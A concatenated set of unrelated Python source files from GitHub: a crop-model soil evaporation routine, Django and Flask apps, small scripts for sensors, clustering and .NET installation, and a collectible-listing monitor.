# Get water storage (mm) when there is no evaporation\n Wlower = np.copy(self.var.Wevap_Dry)\n # Get relative depletion of evaporation storage in stage 2\n Wrel_divd = (self.var.Wevap_Act - Wlower)\n Wrel_divs = (Wupper - Wlower)\n Wrel = np.divide(Wrel_divd, Wrel_divs, out=np.zeros_like(Wrel_divs), where=Wrel_divs!=0)\n return Wrel, Wlower, Wupper \n \n def dynamic(self):\n \n # Add crop dimension to self.var.vars\n et0 = self.var.referencePotET[None,:,:] * np.ones((self.var.nCrop))[:,None,None]\n prec = self.var.precipitation[None,:,:] * np.ones((self.var.nCrop))[:,None,None]\n\n # Prepare stage 2 evaporation (REW gone), if day one of simulation\n cond1 = (self.var._modelTime.timeStepPCR == 1)\n if self.var._modelTime.timeStepPCR == 1:\n self.var.Wsurf.fill(0)\n 
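relative_depletion above normalises the evaporation-layer storage to a 0-1 scale, guarding the division with np.divide(..., where=den != 0); stage 2 then curves that depletion into the reduction coefficient Kr = (e^(fevap*Wrel) - 1) / (e^fevap - 1), as in the dynamic() loop further down. A numeric check (fevap = 4 is only an illustrative shape-factor value; assumes numpy):

```python
import numpy as np

# Relative depletion: 0 at air-dry, 1 at the stage-2 starting storage.
Wact, Wlower, Wupper = np.array([12.0]), np.array([4.0]), np.array([20.0])
num, den = Wact - Wlower, Wupper - Wlower
Wrel = np.divide(num, den, out=np.zeros_like(den), where=den != 0)

fevap = 4.0  # illustrative evaporation-decline shape factor
Kr = np.clip((np.exp(fevap * Wrel) - 1) / (np.exp(fevap) - 1), None, 1)
print(Wrel, Kr)  # [0.5] [~0.12]: a half-depleted layer evaporates at ~12% of potential
```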
self.var.EvapZ = np.copy(self.var.EvapZmin)\n self.var.Wstage2 = self.prepare_stage_two_evaporation()\n \n # Prepare soil evaporation stage 1 - adjust water in surface evaporation\n # layer for any infiltration (only do this if rainfall occurs or when\n # irrigation is triggered)\n cond2 = ((prec > 0) | np.any(((self.var.Irr > 0) & (self.var.IrrMethod != 4)), axis=0))\n cond21 = (cond2 & (self.var.Infl > 0))\n self.var.Wsurf[cond21] = self.var.Infl[cond21]\n self.var.Wsurf[cond21] = np.clip(self.var.Wsurf, None, self.var.REW)[cond21]\n self.var.Wstage2[cond21] = 0 # TODO: is this right?\n self.var.EvapZ[cond21] = self.var.EvapZmin[cond21]\n self.var.Stage2[cond21] = False\n\n # Calculate potential soil evaporation rate (mm/day)\n if self.var.CalendarType == 1:\n tAdj = (self.var.DAP - self.var.DelayedCDs) # * growing_season_index\n elif self.var.CalendarType == 2:\n tAdj = (self.var.GDDcum - self.var.DelayedGDDs) # * growing_season_index\n\n EsPot = self.potential_soil_evaporation_rate(tAdj)\n \n # Adjust potential soil evaporation for mulches and/or partial wetting\n EsPotMul = np.copy(EsPot)\n cond1 = (self.var.SurfaceStorage < 0.000001)\n cond11 = (cond1 & (self.var.Mulches == 1))\n cond111 = (cond11 & self.var.GrowingSeasonIndex)\n EsPotMul[cond111] = (EsPot * (1 - self.var.fMulch * (self.var.MulchPctGS / 100)))[cond111]\n cond112 = (cond11 & np.logical_not(self.var.GrowingSeasonIndex))\n EsPotMul[cond112] = (EsPot * (1 - self.var.fMulch * (self.var.MulchPctOS / 100)))[cond112]\n\n # Partial surface wetting by irrigation\n EsPotIrr = np.copy(EsPot)\n cond1 = ((self.var.Irr > 0) & (self.var.IrrMethod != 4))\n cond11 = (cond1 & ((prec > 0) | (self.var.SurfaceStorage > 0)))\n EsPotIrr[cond11] = EsPot[cond11]\n cond12 = (cond1 & np.logical_not(cond11))\n EsPotIrr[cond12] = (EsPot * (self.var.WetSurf / 100))[cond12] # TODO: more informative name for wet_surf\n # return EsPotIrr\n\n # Assign minimum value (mulches and partial wetting don't combine)\n EsPot = np.minimum(EsPotIrr, EsPotMul)\n\n # Initialise actual evaporation counter\n self.var.EsAct = np.zeros((self.var.nCrop, self.var.nLat, self.var.nLon))\n\n # Surface evaporation \n # EsActSurf = surface_evaporation(self.var.SurfaceStorage, EsPot)\n EsActSurf = np.zeros((self.var.nCrop, self.var.nLat, self.var.nLon))\n cond9 = (self.var.SurfaceStorage > 0)\n cond91 = (cond9 & (self.var.SurfaceStorage > EsPot))\n EsActSurf[cond91] = EsPot[cond91]\n self.var.SurfaceStorage[cond91] -= EsActSurf[cond91]\n cond92 = (cond9 & np.logical_not(cond91))\n EsActSurf[cond92] = self.var.SurfaceStorage[cond92] \n \n self.var.EsAct += EsActSurf\n cond = ((self.var.SurfaceStorage > 0) & (self.var.SurfaceStorage <= EsPot))\n self.var.SurfaceStorage -= EsActSurf\n self.var.Wsurf[cond] = self.var.REW[cond]\n self.var.Wstage2[cond] = 0\n self.var.EvapZ[cond] = self.var.EvapZmin[cond]\n \n # Stage 1 evaporation\n dz = self.var.dz[None,:,None,None] * np.ones((self.var.nCrop, self.var.nLat, self.var.nLon))[:,None,:,:]\n dzsum = self.var.dzsum[None,:,None,None] * np.ones((self.var.nCrop, self.var.nLat, self.var.nLon))[:,None,:,:]\n\n # Determine total water to be extracted\n # print EsPot[0,0,0]\n # print self.var.EsAct[0,0,0]\n ToExtract = EsPot - self.var.EsAct\n # print ToExtract[0,0,0]\n\n # Determine total water to be extracted in stage one (limited by\n # surface layer water storage)\n ExtractPotStg1 = np.minimum(ToExtract, self.var.Wsurf)\n\n # Extract water\n cond10 = (ExtractPotStg1 > 0)\n self.extract_water(ToExtract, ExtractPotStg1)\n \n # Update 
surface evaporation layer water balance\n self.var.Wsurf[cond10] -= self.var.EsAct[cond10]\n cond102 = (cond10 & ((self.var.Wsurf < 0) | (ExtractPotStg1 > 0.0001)))\n self.var.Wsurf[cond102] = 0\n\n # If surface storage completely depleted, prepare stage 2 evaporation\n cond103 = (cond10 & (self.var.Wsurf < 0.0001))\n Wstage2_tmp = self.prepare_stage_two_evaporation()\n self.var.Wstage2[cond103] = Wstage2_tmp[cond103] # TODO: add MASK argument to function?\n \n # Stage 2 evaporation\n # self.var.th, self.var.EsAct = soil_evaporation_stage_two(\n # self.var.th,\n # self.var.th_s_comp,\n # self.var.th_fc_comp,\n # self.var.th_wp_comp,\n # self.var.th_dry_comp,\n # EsPot,\n # self.var.EsAct,\n # self.var.dz,\n # self.var.dzsum,\n # self.var.EvapZmin,\n # self.var.EvapZmax,\n # self.var.REW,\n # self.var.EvapZ,\n # self.var.fWrelExp,\n # self.var.fevap,\n # self.var.Wstage2,\n # ToExtract,\n # EvapTimeSteps=20)\n\n # print ToExtract[0,0,0]\n # print self.var.EvapZmax[0,0,0]\n # print self.var.EvapZmin[0,0,0]\n # print self.var.EvapZ[0,0,0]\n # print self.var.fevap[0,0,0]\n # print self.var.fWrelExp[0,0,0]\n\n # Extract water\n EvapTimeSteps = 20\n cond11 = (ToExtract > 0) \n if np.any(cond11):\n Edt = ToExtract / EvapTimeSteps\n # Loop sub-daily time steps\n for jj in range(EvapTimeSteps):\n\n # Get water storage (mm) at start of stage 2 evaporation\n Wrel, Wlower, Wupper = self.relative_depletion()\n\n # Check if need to expand evaporative layer\n cond111 = (cond11 & (self.var.EvapZmax > self.var.EvapZmin))\n Wcheck = (self.var.fWrelExp * ((self.var.EvapZmax - self.var.EvapZ) / (self.var.EvapZmax - self.var.EvapZmin)))\n while np.any(cond111 & (Wrel < Wcheck) & (self.var.EvapZ < self.var.EvapZmax)):\n cond1111 = (cond111 & (Wrel < Wcheck) & (self.var.EvapZ < self.var.EvapZmax))\n\n # Expand evaporation layer by 1mm\n self.var.EvapZ[cond1111] += 0.001\n\n # Recalculate current water storage for new EvapZ\n Wrel, Wlower, Wupper = self.relative_depletion()\n Wcheck = (self.var.fWrelExp * ((self.var.EvapZmax - self.var.EvapZ) / (self.var.EvapZmax - self.var.EvapZmin)))\n\n # Get stage 2 evaporation reduction coefficient\n Kr = ((np.exp(self.var.fevap * Wrel) - 1) / (np.exp(self.var.fevap) - 1))\n Kr = np.clip(Kr, None, 1)\n\n # Get water to extract (NB Edt is zero in cells which do not\n # need stage 2, so no need for index)\n # print '********'\n # print self.var.Wevap_Act[0,0,0]\n # print self.var.Wevap_Sat[0,0,0]\n # print self.var.Wevap_Fc[0,0,0]\n # print self.var.Wevap_Dry[0,0,0]\n # print self.var.Wstage2[0,0,0]\n # print Wrel[0,0,0]\n # print Kr[0,0,0]\n # print Edt[0,0,0]\n ToExtractStg2 = (Kr * Edt)\n # print ToExtractStg2[0,0,0]\n self.extract_water(ToExtract, ToExtractStg2)\n # print self.var.th[0,0,0,0]\n # thnew, EsAct, ToExtract, ToExtractStg2 = extract_water(\n # thnew, th_dry, dz, dzsum, EvapZmin, EsAct, ToExtract, ToExtractStg2)\n\n # print self.var.th[0,0,0,0]\n # return thnew, EsAct\n\n # Store potential evaporation for irrigation calculations on next day\n self.var.Epot = np.copy(EsPot)\n\n # print self.var.th[0,0,0,0]\n","repo_name":"Carlitosh/AquaCrop_Py","sub_path":"SoilEvaporation.py","file_name":"SoilEvaporation.py","file_ext":"py","file_size_in_byte":16902,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"27"} +{"seq_id":"26703937374","text":"from glua.balancer.models import Files,Filetrack,Filetrackday,Mirror,Mirrorbw\r\nfrom django.contrib import admin\r\n\r\nclass FileTrackAdmin(admin.ModelAdmin):\r\n #pass\r\n list_display 
= ('file','year','month','dls','bandwidth')\r\n list_filter = ('year','month','file')\r\n\r\nclass FileTrackDayAdmin(admin.ModelAdmin):\r\n #pass\r\n list_display = ('file','year','month','day','dls','bandwidth')\r\n list_filter = ('year','month','day','file')\r\n\r\nclass MirrorAdmin(admin.ModelAdmin):\r\n list_display = ('name','enabled','bwlimit','description')\r\n list_filter = ('enabled','bwlimit')\r\n\r\nclass MirrorBwAdmin(admin.ModelAdmin):\r\n list_display = ('mirror','year','month','totalbw')\r\n list_filter = ('mirror','month','year',)\r\n ordering = ('-year','month',)\r\n\r\nadmin.site.register(Files)\r\nadmin.site.register(Filetrack,FileTrackAdmin)\r\nadmin.site.register(Filetrackday,FileTrackDayAdmin)\r\nadmin.site.register(Mirror,MirrorAdmin)\r\nadmin.site.register(Mirrorbw,MirrorBwAdmin)","repo_name":"gmorell/Glua.net-SVN-Packager","sub_path":"balancer/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36116274090","text":"'''1) Procure quem foi a pessoa que mais gastou?'''\n\nimport csv\nfrom functions import read_data, convert_to_dicionary \n\nfilename = 'compras.csv'\n\n#leitura de Arquivo\n\ndata = read_data(filename)\n\nregister = len(data)\n\n#transformação dos registros para dicionario (convertendo valores)\n \ninfo = convert_to_dicionary(data)\n \n#processamento\n\nbiggest_purchase = -1\n\nindex_biggest_purchase = 0\n\nheader = data[0]\n\nfor index, line in enumerate(info):\n if line['compra'] > biggest_purchase:\n biggest_purchase = line['compra']\n index_biggest_purchase = index\n \nperson = info[index_biggest_purchase]\n \n#saída de dados \n \nprint(f'\\n{\" MAIOR COMPRA \":=^30}\\n\\n{\".\"*30}\\n\\nNome: {person[\"nome\"]} {person[\"sobrenome\"]}\\n\\nValor da Compra: R$ {person[\"compra\"]:,.2f}\\n\\n{\".\"*30}\\n\\n{\"=\"*30}\\n')\n\n\n\n \n\n ","repo_name":"MarcusPauloFaustino1/Exercicios-Growdev","sub_path":"semana05_aula01/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39092369224","text":"#!/usr/bin/env/python3\nimport RPi.GPIO as GPIO\nimport time, datetime\nimport Adafruit_DHT\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.image import MIMEImage\nfrom template import *\n\n\ngmail_sender = ''\ngmail_passwd = ''\n\nserver = smtplib.SMTP('smtp.gmail.com', 587)\nserver.ehlo()\nserver.starttls()\nserver.ehlo()\nserver.login(gmail_sender, gmail_passwd)\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(21,GPIO.OUT)\nGPIO.output(21,GPIO.HIGH)\n\ndef Rounding():\n try:\n humidity, temperature = Adafruit_DHT.read_retry(Adafruit_DHT.AM2302, 4)\n temperature = round(temperature,2)\n humidity = round(humidity,2)\n except:\n pass\n return temperature, humidity\n\n'''\ntemp <26: ext-krzysztof.heigel@here.com\ntemp >26: ext-krzysztof.heigel@here.com\ntemp >32: ext-krzysztof.heigel@here.com\n'''\n\ndef EmailSend(TEXT, SUBJECT, recipients, temp):\n server.set_debuglevel(1)\n message = MIMEMultipart('related')\n message.attach(MIMEText(TEXT, 'html'))\n img = '1.jpg'\n if (temp<26):\n img = '1.jpg'\n elif (temp>=26 and temp<32):\n img = '2.jpg'\n elif (temp>=32):\n img = '3.jpg'\n \n with open(img, 'rb') as image_file:\n image = MIMEImage(image_file.read())\n image.add_header('Content-ID', '')\n 
image.add_header('Content-Disposition', 'inline', filename=img)\n message.attach(image)\n \n message['Subject'] = SUBJECT\n message['From'] = gmail_sender\n message['To'] = \", \".join(recipients)\n server.sendmail(gmail_sender, recipients, message.as_string())\n \nwhile True:\n temperature,humidity = Rounding()\n recipients = ['ext-krzysztof.heigel@here.com']\n EmailSend(TEXTOK.format(temperature), SUBJECTOK, recipients, temperature)\n while temperature<26:\n temperature,humidity = Rounding()\n #time.sleep(30)\n print(\"Temperature: {}C below 26 Humidity: {}% Date and Time: {}\".format(temperature, humidity, datetime.datetime.now()))\n if temperature>=26:\n recipients = ['ext-krzysztof.heigel@here.com']\n EmailSend(TEXT26.format(temperature), SUBJECT26, recipients, temperature)\n while temperature>=26 and temperature<32:\n temperature,humidity = Rounding()\n #time.sleep(30)\n print(\"Temperature: {}C below 32 Humidity: {}% Date and Time: {}\".format(temperature, humidity, datetime.datetime.now()))\n if temperature>=32:\n recipients = ['ext-krzysztof.heigel@here.com']\n EmailSend(TEXT32.format(temperature), SUBJECT32, recipients, temperature)\n \n \n \n \n \n \n","repo_name":"kfheigel/Temperature-Sensor","sub_path":"temperature.py","file_name":"temperature.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"3728617690","text":"#!/usr/bin/env python3\n\n# Standard library imports\n\n# Remote library imports\nfrom flask import request, Flask, jsonify, make_response\nfrom flask_migrate import Migrate\nfrom flask_restful import Resource, Api\n# Local imports\nfrom config import app, db, api\nfrom models import User, Trait, TraitAssociation, Goblin, Date, Dialogue, Response, Outcome\n# Add your model imports\n# Views go here!\n\n@app.route('/')\ndef index():\n return '
<h1>Phase 4 Project Server</h1>
'\n\nclass Users(Resource):\n \n def get(self):\n users = [user.to_dict(rules=('-traits','-trait_associations')) for user in User.query.all()]\n return make_response(jsonify(users), 200)\n \n def post(self):\n data = request.get_json(force=True)\n try:\n \n new_user = User(**data)\n db.session.add(new_user)\n db.session.commit()\n return make_response(jsonify(new_user.to_dict(rules=('-traits',))), 201)\n \n except ValueError as e:\n return make_response(jsonify({'error': str(e)}), 400)\n \napi.add_resource(Users, '/users') \n\nclass UsersById(Resource):\n \n def get(self, id):\n user = User.query.filter_by(id=id).first()\n if not user:\n return make_response(jsonify({'error': 'User not found'}), 404)\n return make_response(jsonify(user.to_dict()), 200)\n \n def patch(self, id):\n data = request.get_json(force=True)\n try:\n user = User.query.filter_by(id=data['id']).first()\n for key, value in data.items():\n setattr(user, key, value)\n db.session.commit()\n return make_response(jsonify(user.to_dict(rules=('-traits',))), 200)\n \n except ValueError as e:\n return make_response(jsonify({'error': str(e)}), 400)\n \n def delete(self, id):\n data = request.get_json(force=True)\n try:\n user = User.query.filter_by(id=data['id']).first()\n db.session.delete(user)\n db.session.commit()\n return make_response(jsonify(user.to_dict(rules=('-traits',))), 200)\n \n except ValueError as e:\n return make_response(jsonify({'error': str(e)}), 400)\napi.add_resource(UsersById, '/users/') \n\nclass Traits(Resource):\n def get(self):\n traits = [trait.to_dict(rules=('-users', '-dialogues', '-trait_associations')) for trait in Trait.query.all()]\n return make_response(jsonify(traits), 200)\napi.add_resource(Traits, '/traits') \n\n \nclass TraitAssociations(Resource):\n def get(self):\n user_id = request.args.get('user_id')\n if user_id:\n trait_associations = [trait_association.to_dict(rules=('-users', '-traits')) for trait_association in TraitAssociation.query.filter_by(user_id=user_id).all()]\n return make_response(jsonify(trait_associations), 200)\n else:\n trait_associations = [trait_association.to_dict(rules=('-users', '-traits')) for trait_association in TraitAssociation.query.all()]\n return make_response(jsonify(trait_associations), 200)\n def post(self):\n data = request.get_json(force=True)\n try:\n new_trait_association = TraitAssociation(**data)\n db.session.add(new_trait_association)\n db.session.commit()\n return make_response(jsonify(new_trait_association.to_dict(rules=('-users', '-traits'))), 201)\n \n except ValueError as e:\n return make_response(jsonify({'error': str(e)}), 400)\napi.add_resource(TraitAssociations, '/trait_associations')\n\nclass Goblins(Resource):\n \n def get(self):\n goblins = [goblin.to_dict(rules=('-responses', '-outcomes')) for goblin in Goblin.query.all()]\n return make_response(jsonify(goblins), 200)\napi.add_resource(Goblins, '/goblins') \n\nclass Dates(Resource):\n \n def get(self):\n dates = [date.to_dict(rules=('-dialogues', '-outcomes')) for date in Date.query.all()]\n return make_response(jsonify(dates), 200) \napi.add_resource(Dates, '/dates')\n\nclass Dialogues(Resource):\n def get(self):\n dialogues = [dialogue.to_dict() for dialogue in Dialogue.query.all()]\n return make_response(jsonify(dialogues), 200)\napi.add_resource(Dialogues, '/dialogues')\n\nclass Responses(Resource):\n def get(self):\n responses = [response.to_dict(rules=('-outcomes',)) for response in Response.query.all()]\n return make_response(jsonify(responses), 
200)\napi.add_resource(Responses, '/responses')\n\nclass Outcomes(Resource):\n def get(self):\n outcome_dicts = [outcome.to_dict() for outcome in Outcome.query.all()]\n return make_response(jsonify(outcome_dicts), 200)\napi.add_resource(Outcomes, '/outcomes')\n\nif __name__ == '__main__':\n app.run(port=5555, debug=True)","repo_name":"elisemcclain/GoblinLove","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14182823788","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 02 08:11:32 2017\n\n@author: Smau2\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets.samples_generator import make_blobs\nfrom sklearn.cluster import k_means\nfrom sklearn.metrics import adjusted_mutual_info_score, mutual_info_score, normalized_mutual_info_score\n\ndef kMeans_accuracy(dist):\n num_samples = 100\n #fig = plt.figure()\n #ax = fig.add_subplot(211)\n X,y = make_blobs(n_samples=num_samples, centers=[[0,0],[dist,0]], n_features=2)\n #colors = ['red','blue','green']\n #for i in range(len(X)):\n # ax.scatter(X[i][0],X[i][1],color=colors[y[i]])\n centroid, labels, intertia, iterations = k_means(n_clusters=2,X=X,return_n_iter=True)\n correct = 0;\n score = (normalized_mutual_info_score(y,labels))\n for i in range(len(X)):\n if labels[i] == y[i]:\n correct = correct + 1\n correct = max(correct, num_samples-correct)\n return [correct/float(num_samples),iterations,score]\n #ax = fig.add_subplot(212)\n #for i in range(len(X)):\n # ax.scatter(X[i][0],X[i][1],color=colors[labels[i]])\n\ndistances = [(x/2.0) for x in reversed(range(21))]\nprint(distances)\naccuracy = []\nstd_acc = []\nmi_score = []\nstd_mi_score = []\niterations = []\nstd_iterations = []\n\ntrials_acc = []\ntrials_iter = []\ntrials_mi = []\n\n\n\nfor dist in distances:\n for i in range(0,100):\n kMeans_trial = kMeans_accuracy(dist)\n trials_acc.append(kMeans_trial[0])\n trials_iter.append(kMeans_trial[1])\n trials_mi.append(kMeans_trial[2])\n accuracy.append(np.average(trials_acc))\n std_acc.append(np.std(trials_acc))\n iterations.append(np.average(trials_iter))\n std_iterations.append(np.std(trials_iter))\n mi_score.append(np.average(trials_mi))\n std_mi_score.append(np.std(trials_mi))\n trials_acc = []\n trials_iter = []\n trials_mi = []\n\nplt.errorbar(distances,mi_score,std_mi_score,fmt='o', capsize=5)\n\n\n","repo_name":"Smau4/kMeans","sub_path":"overlap.py","file_name":"overlap.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72129343111","text":"from neuron import h\n#h.nrnmpi_init()\npc = h.ParallelContext()\n\nid = int(pc.id())\nnhost = int(pc.nhost())\n\nprint ('I am %d of %d'%(id, nhost))\n\npc.barrier()\nh.quit()\n","repo_name":"pkuzyc/DeepDendrite","sub_path":"src/nrn_modify/src/parallel/test0.py","file_name":"test0.py","file_ext":"py","file_size_in_byte":166,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"27"} +{"seq_id":"5473047814","text":"# mirkobrombin \n# ------------------------------\n# Install .NET Core on Solus OS\n# License: MIT\n\n\nimport os\nimport re\nimport pathlib\nimport shutil\nimport tarfile\nimport urllib.request\nimport sys\n\nDOTNET_REPO_URL = \"https://dotnet.microsoft.com\"\nDOTNET_REPO_INDEX = f\"{DOTNET_REPO_URL}/download/dotnet\"\nDOTNET_STORE_DIR = 
f\"{pathlib.Path.home()}/.netcore\"\nDOTNET_STORE_TEMP_DIR = f\"{pathlib.Path.home()}/.netcore/temp\"\n\n\nclass DotNetModel:\n def __init__(self, version, url):\n self.version = version\n self.url = url\n\n\nclass DotNetManager:\n def __init__(self):\n self.versions = list(self.__fetch_versions())\n self.__check_installation()\n self.__check_dir()\n self.__start_ui()\n\n @staticmethod\n def __check_installation():\n dotnet_path = shutil.which(\"dotnet\")\n if dotnet_path is not None:\n print(\"dotnet is already installed\")\n\n @staticmethod\n def __check_dir():\n if not os.path.isdir(DOTNET_STORE_DIR):\n os.mkdir(DOTNET_STORE_DIR)\n if not os.path.isdir(DOTNET_STORE_TEMP_DIR):\n os.mkdir(DOTNET_STORE_TEMP_DIR)\n\n def __start_ui(self):\n self.__menu_title(\".NET Core Manager\")\n self.__select_version()\n self.__select_package()\n self.__install_package()\n\n def __select_version(self):\n self.__menu_title(\"Select version:\")\n for i, version in enumerate(self.versions):\n print(f\"{i}. {version.version}\")\n\n try:\n selection = int(input(\"Select version: \"))\n if selection < 0 or selection > len(self.versions):\n raise ValueError\n self.__selected_version = self.versions[selection]\n except ValueError:\n print(\"Invalid input\")\n self.__select_version()\n\n def __select_package(self):\n self.__menu_title(\"Select package:\")\n print(\"1. SDK\")\n print(\"2. Runtime\")\n print(\"0. Exit\")\n\n try:\n selection = int(input(\"Select package: \"))\n if selection < 0 or selection > 2:\n raise ValueError\n elif selection == 1:\n self.__selected_package = \"sdk\"\n elif selection == 2:\n self.__selected_package = \"runtime\"\n else:\n exit()\n except ValueError:\n print(\"Invalid input\")\n self.__select_package()\n\n def __install_package(self):\n package_path = f\"{DOTNET_STORE_TEMP_DIR}/{self.__selected_version.version}-{self.__selected_package}.tar.gz\"\n install_path = f\"{DOTNET_STORE_DIR}/{self.__selected_version.version}-{self.__selected_package}\".replace(\n \" \", \"-\")\n\n print(\"\\n\")\n print(\"Downloading package...\")\n print(\"Please wait...\")\n url = self.__get_package_url()\n urllib.request.urlretrieve(url, package_path, reporthook=self.__download_progress)\n\n print(\"\\n\")\n print(\"Extracting package...\")\n print(\"Please wait...\")\n with tarfile.open(package_path) as tar:\n def is_within_directory(directory, target):\n \n abs_directory = os.path.abspath(directory)\n abs_target = os.path.abspath(target)\n \n prefix = os.path.commonprefix([abs_directory, abs_target])\n \n return prefix == abs_directory\n \n def safe_extract(tar, path=\".\", members=None, *, numeric_owner=False):\n \n for member in tar.getmembers():\n member_path = os.path.join(path, member.name)\n if not is_within_directory(path, member_path):\n raise Exception(\"Attempted Path Traversal in Tar File\")\n \n tar.extractall(path, members, numeric_owner=numeric_owner) \n \n \n safe_extract(tar, install_path)\n os.remove(package_path)\n\n print(\"\\n\")\n print(\"Installing...\")\n print(\"Please wait...\")\n os.symlink(f\"{install_path}/dotnet\",\n f\"{pathlib.Path.home()}/.local/bin/dotnet\")\n\n print(\"\\n\")\n print(\"Testing dotnet binary...\")\n print(\"Please wait...\")\n test = shutil.which(\"dotnet\")\n if test is None:\n print(\"dotnet binary not in PATH, adding...\")\n path = \"PATH=$PATH:~/.local/bin\"\n with open(f\"{pathlib.Path.home()}/.profile\", \"a\") as f:\n f.write(f\"export {path}\")\n if os.environ[\"SHELL\"] == \"/bin/bash\":\n with open(f\"{pathlib.Path.home()}/.bashrc\", 
\"a\") as f:\n f.write(f\"export {path}\")\n elif os.environ[\"SHELL\"] == \"/bin/zsh\":\n with open(f\"{pathlib.Path.home()}/.zshrc\", \"a\") as f:\n f.write(f\"export {path}\")\n\n print(\"\\n\")\n print(\"Installation complete\")\n print(\"Please restart your terminal\")\n exit()\n\n def __download_progress(self, count, block_size, total_size):\n percent = int(count * block_size * 100 / total_size)\n bar = \"■\" * int(percent / 2) + \"□\" * (50 - int(percent / 2))\n sys.stdout.write(f\"\\r{bar} {percent}%\")\n sys.stdout.flush()\n if percent == 100:\n sys.stdout.write(\"\\n\")\n sys.stdout.flush()\n\n def __get_package_url(self):\n url = f\"{DOTNET_REPO_URL}{self.__selected_version.url}\"\n with urllib.request.urlopen(url) as r:\n source = r.read().decode(\"utf-8\")\n\n if self.__selected_package == \"sdk\":\n pattern = re.compile(\n r\"]*aria-labelledby=\\\"download-release-sdk-[^\\\"]*\\\"[^>]*>(.*?)\", re.DOTALL)\n content = pattern.findall(source)[0]\n pattern = r\"]*href=\\\"/download/dotnet/thank-you/sdk-(.*?)-linux-x64-binaries*\\\"[^>]*>.*?\"\n url = re.compile(pattern).findall(content)[0]\n url = f\"{DOTNET_REPO_URL}/download/dotnet/thank-you/sdk-{url}-linux-x64-binaries\"\n\n elif self.__selected_package == \"runtime\":\n pattern = re.compile(\n r\"]*aria-labelledby=\\\"download-release-runtime-desktop-[^\\\"]*\\\"[^>]*>(.*?)\", re.DOTALL)\n content = pattern.findall(source)[0]\n pattern = r\"]*href=\\\"/download/dotnet/thank-you/runtime-(.*?)-linux-x64-binaries*\\\"[^>]*>.*?\"\n url = re.compile(pattern).findall(content)[0]\n url = f\"{DOTNET_REPO_URL}/download/dotnet/thank-you/runtime-{url}-linux-x64-binaries\"\n\n with urllib.request.urlopen(url) as r:\n source = r.read().decode(\"utf-8\")\n pattern = re.compile(\n r\"]*id=\\\"directLink\\\"[^>]*href=\\\"(.*?)\\\"[^>]*>.*?\", re.DOTALL)\n direct_link = pattern.findall(source)[0]\n return direct_link\n\n @staticmethod\n def __fetch_versions():\n with urllib.request.urlopen(DOTNET_REPO_INDEX) as r:\n source = r.read().decode(\"utf8\")\n pattern = re.compile(r\"(.*?)\", re.DOTALL)\n content = pattern.findall(source)[0]\n\n pattern = re.compile(\n r\"(.*?)\", re.DOTALL)\n links = pattern.findall(content)\n\n for l in links:\n yield DotNetModel(l[1], l[0])\n\n return []\n\n @staticmethod\n def __menu_title(title):\n print(\"\\n\")\n print(f\"\\33[1m\\33[30m{title}\\033[0m\")\n print(\"-\" * len(title))\n\ndn_manager = DotNetManager()\n","repo_name":"mirkobrombin/BetterCallSolus","sub_path":"netcore.py","file_name":"netcore.py","file_ext":"py","file_size_in_byte":7653,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"33731279744","text":"import asyncio\nimport logging\nimport zmq\nfrom typing import List, Tuple\nimport time\nimport redis\nimport random\nimport logging\nfrom request import load_targets_config, get_new_list_default, get_moment_listings\nfrom loggers import setup_logging_pre\nimport subprocess\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_target_number(old_list, new_list=None, target_price: float = 1) -> List[Tuple[str, float, float]]:\n if new_list is None:\n filter_by_price_single = filter(lambda n: float(\n n['moment']['price']) <= target_price, old_list)\n return list(map(lambda n: (n['moment']['flowSerialNumber'], target_price, float(n['moment']['price'])), filter_by_price_single))\n\n filter_listings = filter(\n lambda n: n['id'] not in map(lambda j: j['id'], old_list),\n new_list\n )\n filter_by_price = filter(lambda n: float(\n 
n['moment']['price']) <= target_price, filter_listings)\n return list(map(lambda n: (n['moment']['flowSerialNumber'], target_price, float(n['moment']['price'])), filter_by_price))\n\n\nasync def process(set_id, play_id, sn_targets, floor_price, socket, redis_client):\n # TODO 改为绝对数值\n # TODO 设置价格过滤\n margin = 0.15 # 接受floor价贵20%的特殊编号\n discount = 0.15 # 比floor价低20%的无视编号直接秒\n\n moment_listings_new = await get_moment_listings(set_id, play_id)\n target_infos = get_target_number(\n moment_listings_new, target_price=floor_price * (1 + margin))\n if len(target_infos) != 0:\n for target_info in target_infos: # 测试时加上[:1]\n number, target_price, market_price = target_info[0], target_info[1], target_info[2]\n\n if market_price > target_price * (1-(margin+discount)):\n if number not in sn_targets: # 如果目标编号不是特殊编号\n logger.debug(\n f\"其他编号:{number},目标价{target_price:.0f}, 现价{market_price:.0f}, 跳过\")\n continue\n signal = '0'+' '+set_id+' '+play_id+' ' + number\n url = f\"www.nbatopshot.com/listings/p2p/{set_id}+{play_id}?serialNumber={number}\"\n subprocess.run(\"pbcopy\", universal_newlines=True,\n input=url) # 复制到剪切板\n logger.info(\n f\"{url},目标价{target_price:.0f}, 现价{market_price:.0f}, 进入购买\")\n if redis_client.get(signal) is None:\n logger.info(f\"send: {signal}\")\n socket.send_string(signal)\n redis_client.set(signal, 1)\n else:\n logger.info(f'{signal} has sent, skip')\n else:\n logger.debug(\"没有获取到目标价位的moment\")\n\n\nasync def main():\n setup_logging_pre()\n redis_client = redis.Redis(host='localhost', port=6379, 